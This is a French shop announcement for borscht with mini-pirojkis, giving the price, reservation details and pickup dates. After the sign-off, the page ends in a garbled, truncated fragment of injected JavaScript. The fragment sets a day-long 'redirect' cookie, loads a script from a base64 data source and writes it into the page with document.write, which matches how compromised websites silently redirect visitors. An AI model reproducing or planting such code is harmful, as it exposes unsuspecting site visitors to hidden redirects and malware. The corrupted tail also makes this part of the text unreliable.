• Français



Un borscht et ses mini-pirojkis…

Les betteraves sont cuites à part jusqu’à en obtenir la quintessence, puis le jus est intimement lié au bouillon de boeuf cuit avec ses légumes jusqu’à obtenir un juste équilibre salé, légèrement acidulé…

Pour accompagner ce délicieux bouillon, 4 mini-pirojkis à la viande de boeuf…

La portion par personne (1 L) est à 18 € (uniquement sur réservation).

Votre plat sera disponible à la boutique dès vendredi 29 novembre à 10h pour le déguster jusqu’à dimanche au plus tard (si vous souhaitez le garder au-delà de dimanche, nous vous conseillons de le congeler).

Vous pouvez réserver dès maintenant le nombre de portions souhaitées, par retour d’e-mail ou par téléphone au 01 48 87 92 85.

A très vite !

image003 (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,.”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘